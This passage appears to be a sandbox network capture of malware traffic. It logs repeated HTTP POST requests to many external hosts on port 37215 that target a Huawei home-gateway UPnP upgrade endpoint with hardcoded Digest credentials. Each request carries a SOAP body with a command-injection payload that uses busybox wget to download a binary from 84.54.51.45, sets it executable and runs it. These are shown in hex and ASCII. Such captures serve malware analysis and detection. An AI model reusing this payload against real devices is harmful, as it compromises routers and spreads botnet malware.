6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            666192.168.2.155308041.70.204.18937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160891056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            667192.168.2.155734641.7.28.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160911083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            668192.168.2.155250441.151.31.10537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160911083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            669192.168.2.155808441.40.57.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160928965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            670192.168.2.153525441.205.73.11637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160948038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            671192.168.2.155412641.72.239.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160978079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            672192.168.2.155535441.84.195.25437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160979033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            673192.168.2.153323841.146.245.5437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160981894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            674192.168.2.155560841.19.73.9637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161030054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            675192.168.2.155328041.191.155.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161047935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            676192.168.2.155324041.174.108.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161047935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
